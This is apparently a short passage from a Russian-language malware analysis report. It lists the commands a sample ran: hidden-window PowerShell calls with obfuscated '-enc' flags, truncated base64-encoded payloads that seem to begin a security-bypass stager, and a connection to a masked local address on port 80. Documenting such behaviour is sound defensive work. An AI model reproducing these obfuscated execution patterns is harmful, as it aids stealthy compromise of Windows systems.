Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) SQBmACgAJABQAFMAVgBlAHIAUwBJAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AQQBKAE8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlA...
- '<LOCALNET>.200.239':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) SQBmACgAJABQAFMAVgBlAHIAUwBJAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AQQBKAE8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc SQBmACgAJABQAFMAVgBlAHIAUwBJAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AQQBKAE8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAWQBwAGUAKAAn...